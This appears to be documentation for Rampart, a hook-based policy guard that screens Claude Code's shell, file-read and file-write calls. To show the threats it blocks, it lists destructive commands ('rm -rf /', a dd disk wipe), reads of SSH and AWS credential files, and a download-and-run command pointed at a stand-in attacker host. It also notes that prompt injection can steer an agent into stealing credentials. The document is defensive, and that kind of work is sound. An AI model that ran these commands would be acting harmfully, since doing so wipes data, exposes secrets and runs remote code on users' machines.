Securing Claude Code¶

Claude Code is Rampart's primary integration. One command, native hooks, zero overhead.

Why You Need This¶

Claude Code in --dangerously-skip-permissions mode gives the agent unrestricted access to your shell, filesystem, and network. Without guardrails:

rm -rf / or rm -rf ~ runs silently
Your SSH keys, .env files, and API tokens are readable
curl http://attacker.com/exfil | bash executes without warning
A prompt-injected webpage can redirect the agent to exfiltrate your credentials

Rampart sits between Claude Code and your system. Every command is evaluated against your policy before it runs. Dangerous commands are blocked in microseconds. Everything is logged.

What Gets Protected by Default¶

The standard policy (~/.rampart/policies/standard.yaml) uses three different defaults depending on the risk:

Category	Example	Default
Destructive commands	`rm -rf /`, `dd if=/dev/urandom of=/dev/sda`	`deny`
Credential stores / secret files	`cat ~/.ssh/id_rsa`, `cat ~/.aws/credentials`, `cat ~/.codex/auth.json`	`deny`
Sensitive agent-state artifacts	`cat ~/.claude/history.jsonl`, reading Claude sessions, editing `~/.claude/settings.json`	`ask`

This split is deliberate. Secret stores are too dangerous to expose silently. But agent history, shell snapshots, durable memory, and security-relevant settings are often legitimate to inspect, so Rampart requires human approval instead of hard-blocking them.

Setup¶

rampart setup claude-code

That's it. This installs hooks into Claude Code's hook system that intercept every:

Bash command (exec)
File read (read)
File write/edit (write)

How It Works¶

Claude Code has a built-in hook system that allows external tools to evaluate tool calls before they execute. Rampart registers as a hook handler.

Claude Code → Tool Call → rampart hook → Policy Engine → Allow/Deny
                                                       → Audit Trail

When Claude Code wants to run a command, it sends the tool call to rampart hook via stdin. Rampart evaluates it against your policies and returns a JSON response:

// Allowed (explicit allow bypasses Claude Code permission system)
{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"allow"}}

// Denied
{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"deny","permissionDecisionReason":"Rampart: Destructive command blocked"}}

// Requires approval (waits for human decision)
{"hookSpecificOutput":{"hookEventName":"PreToolUse","permissionDecision":"ask","permissionDecisionReason":"Rampart: Manual approval required"}}

Ask behavior: When a policy action is ask, the hook returns "permissionDecision":"ask". Claude Code shows its native permission prompt, so the user approves or denies directly in the Claude Code UI.

Denied commands never execute. Claude Code receives the denial reason and can explain it to the user.

Usage¶

Just use Claude Code normally:

claude

Rampart is completely transparent. Safe commands pass through in microseconds. You won't notice it's there — until it blocks something dangerous.

Monitor in Real Time¶

rampart watch

Custom Policy¶

By default, Rampart uses the standard profile. To customize:

# Edit your policy
vim ~/.rampart/policies/standard.yaml

# Changes take effect immediately (hot reload)

See Configuration for the full policy format.

Uninstall¶

rampart setup claude-code --remove

This removes the Rampart hooks from Claude Code's settings. Your policies and audit logs in ~/.rampart/ are preserved.

Troubleshooting¶

Verify hooks are installed¶

cat ~/.claude/settings.json

You should see Rampart entries for PreToolUse hooks.

Test a decision¶

echo '{"tool_name":"Bash","tool_input":{"command":"rm -rf /"}}' | rampart hook

Check audit log¶

rampart audit tail